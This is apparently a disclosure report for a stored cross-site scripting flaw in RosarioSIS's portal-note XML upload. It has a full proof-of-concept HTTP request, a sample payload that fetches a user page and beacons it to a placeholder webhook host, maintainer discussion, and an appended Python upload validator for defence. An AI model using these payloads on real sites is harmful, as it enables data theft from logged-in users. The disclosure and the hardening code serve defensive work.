Cross-site scripting - Stored via upload xml file in francoisjacquet/rosariosis
Reported on
Apr 23rd 2022
Description
When a user uploads a file with the XML extension (which is in the whitelist), the server stores the XML file at assets/PortalNotesFiles/, so we can access it directly and execute JavaScript code.
Proof of Concept
POST /rosariosis/Modules.php?modname=School_Setup/PortalNotes.php&modfunc=update HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: */*
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------3345002182489293764621537208
Content-Length: 2762
Origin: http://localhost:8080
Connection: close
Referer: http://localhost:8080/rosariosis/Modules.php?modname=School_Setup/PortalNotes.php
Cookie: RosarioSIS=usti6etu55tb38dsu6iq78c1u5
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="values[new][TITLE]"
<h1>123</h1>
-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="values[new][CONTENT]"
<h1>123</h1>

-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="values[new][SORT_ORDER]"
-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="FILE_ATTACHED_FILE"; filename="aaa.xml"
Content-Type: image/png
<html>
<head></head>
<body>
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(window.origin)</a:script>
<info>
<name>
<value>123</value>
</name>
<description>
<value>Hello</value>
</description>
<url>
<value>http://google.com</value>
</url>
</info>
</body>
</html>
-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="values[new][FILE_ATTACHED_EMBED]"
-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="month_values[new][START_DATE]"
-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="day_values[new][START_DATE]"
-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="year_values[new][START_DATE]"
-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="month_values[new][END_DATE]"
-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="day_values[new][END_DATE]"
-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="year_values[new][END_DATE]"
-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="profiles[new][admin]"
-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="profiles[new][teacher]"
-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="profiles[new][parent]"
-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="profiles[new][0]"
-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="profiles[new][1]"
-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="profiles[new][2]"
-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="profiles[new][3]"
-----------------------------3345002182489293764621537208--
PoC images
Impact
This vulnerability allows arbitrary JavaScript code to be executed, the user's cookie to be stolen, etc.
Occurrences
@nhienit2010 - contact has been established with the maintainer, as you can see in the status message above 👍
Let me know if you have any further questions.
Hello @nhienit2010
Thank you for reporting the issue. The XML file is opened in a new browser tab. As far as my test goes, I was not able to retrieve the session cookie. Were you? If so, please update your example.
Oh, the cookie is set to HttpOnly, so it cannot be retrieved.
Now, being in a new tab, the xml file is executed by the browser just like any other file you might open or find on the Internet.
Could you please explain how this could leak user session or other info related to RosarioSIS?
Hello @maintainer,
Because the XML file is uploaded to your website, it is served under the same origin (same origin policy), so JavaScript code in the malicious XML can fetch other users' information and send it to the attacker's host; sometimes this vulnerability also allows an attacker to perform HTTP requests in the victim's browser.
Sample payload
<html>
<head></head>
<body>
<info>
<name>
<value><![CDATA[<script>fetch("https://www.rosariosis.org/demonstration/Modules.php?modname=Users/User.php").then(r=>r.text()).then(d=>navigator.sendBeacon("https://<my-webhook>", d))</script>]]></value>
</name>
<description>
<value>Hello</value>
</description>
<url>
<value>http://google.com</value>
</url>
</info>
</body>
</html>
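As an added illustration (not RosarioSIS code, and not written by the reporter or the maintainer), the following Python shows the server-side checks that close this class of issue for both the description above and the same-origin point raised in the thread: the extension allow-list must exclude every format a browser renders inline (.xml, .html, .svg and friends), the client's declared Content-Type (image/png for a .xml file in the PoC request) is never trusted, the stored bytes are inspected for markup and for script elements in the XHTML namespace, and attachments are served with headers that stop the browser from rendering them as a same-origin document. The function names, the allow-list and the sample inputs are assumptions constructed for this example; the samples are modelled on the two payloads above with a harmless alert body.

```python
"""Hardening checks for an upload handler that allow-lists extensions.

Added example, not project code. Everything here (names, allow-list,
samples) is an assumption made for illustration.
"""
import re
from xml.etree import ElementTree as ET

XHTML_NS = "http://www.w3.org/1999/xhtml"
SVG_NS = "http://www.w3.org/2000/svg"

# Hypothetical allow-list: extension -> the only declared MIME type accepted.
SAFE_EXTENSIONS = {
    "png": "image/png", "jpg": "image/jpeg", "jpeg": "image/jpeg",
    "gif": "image/gif", "pdf": "application/pdf", "txt": "text/plain",
}
# Formats browsers render inline and that can carry script: never allow-list.
ACTIVE_EXTENSIONS = {"xml", "html", "htm", "xhtml", "svg", "xsl", "xslt"}
# Leading bytes expected for the binary formats above (txt has none).
MAGIC = {"png": b"\x89PNG", "jpg": b"\xff\xd8\xff", "jpeg": b"\xff\xd8\xff",
         "gif": b"GIF8", "pdf": b"%PDF"}
SCRIPT_TAGS = {f"{{{XHTML_NS}}}script", f"{{{SVG_NS}}}script", "script"}
SCRIPT_IN_TEXT = re.compile(rb"<\s*script\b", re.IGNORECASE)


def extension_of(filename: str) -> str:
    """Lower-cased final extension of the bare filename; '' if none."""
    base = filename.rsplit("/", 1)[-1].rsplit("\\", 1)[-1]
    return base.rsplit(".", 1)[-1].lower() if "." in base else ""


def looks_like_markup(data: bytes) -> bool:
    """XML, HTML and SVG all begin with '<' after an optional BOM/whitespace."""
    return data.lstrip(b"\xef\xbb\xbf \t\r\n")[:1] == b"<"


def contains_active_content(data: bytes) -> bool:
    """Parse as XML and flag script elements in any namespace (the
    xmlns:a="...xhtml" trick), on* event-handler attributes, and <script>
    text hidden inside CDATA or text nodes. Non-XML input gets a byte scan."""
    try:
        root = ET.fromstring(data)
    except ET.ParseError:
        return SCRIPT_IN_TEXT.search(data) is not None
    for el in root.iter():
        if el.tag in SCRIPT_TAGS or any(a.lower().startswith("on") for a in el.attrib):
            return True
        for text in (el.text, el.tail):
            if text and SCRIPT_IN_TEXT.search(text.encode()):
                return True
    return False


def validate_upload(filename: str, declared_type: str, data: bytes):
    """Return (accepted, reason). The declared Content-Type is client-controlled
    and is only ever compared against the extension and the bytes received."""
    ext = extension_of(filename)
    if ext in ACTIVE_EXTENSIONS:
        return False, f".{ext} is rendered inline by browsers and can carry script"
    if ext not in SAFE_EXTENSIONS:
        return False, f".{ext} is not on the allow-list"
    mime = declared_type.split(";")[0].strip().lower()
    if mime != SAFE_EXTENSIONS[ext]:
        return False, f"declared type {mime} does not match .{ext}"
    magic = MAGIC.get(ext)
    if magic is not None and not data.startswith(magic):
        return False, f"content does not start with the .{ext} signature"
    if looks_like_markup(data) or contains_active_content(data):
        return False, "content is markup or contains script"
    return True, "ok"


def download_headers(stored_name: str) -> dict:
    """Headers for serving a stored attachment so that, even if a bad file
    slipped through, the browser downloads it instead of executing it as a
    same-origin document (CSP 'sandbox' gives an opaque origin if rendered)."""
    safe_name = re.sub(r"[^A-Za-z0-9._-]", "_", stored_name)[:100] or "download"
    return {
        "Content-Type": "application/octet-stream",
        "Content-Disposition": f'attachment; filename="{safe_name}"',
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "sandbox",
    }


# Constructed samples modelled on the report's payloads (harmless alert body).
XHTML_NS_SCRIPT = (b'<html><body><a:script xmlns:a="http://www.w3.org/1999/xhtml">'
                   b"alert(1)</a:script></body></html>")
CDATA_SCRIPT = b"<info><name><value><![CDATA[<script>alert(1)</script>]]></value></name></info>"
PLAIN_XML = b"<info><name><value>123</value></name></info>"
PNG_STUB = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16

if __name__ == "__main__":
    # The PoC request: filename aaa.xml, declared image/png, XHTML script inside.
    for name, ctype, body in [("aaa.xml", "image/png", XHTML_NS_SCRIPT),
                              ("aaa.png", "image/png", XHTML_NS_SCRIPT),
                              ("notes.txt", "text/plain", CDATA_SCRIPT),
                              ("photo.png", "image/png", PNG_STUB)]:
        print(name, validate_upload(name, ctype, body))
    print(download_headers('report "1".xml'))
```

The two halves are independent layers: `validate_upload` rejects the PoC at upload time on the extension alone, and `download_headers` makes the stored copy inert even when served from the application's own origin, which is the same-origin concern discussed in the thread. Hosting user uploads on a separate origin (a dedicated domain) is the stronger form of the second layer.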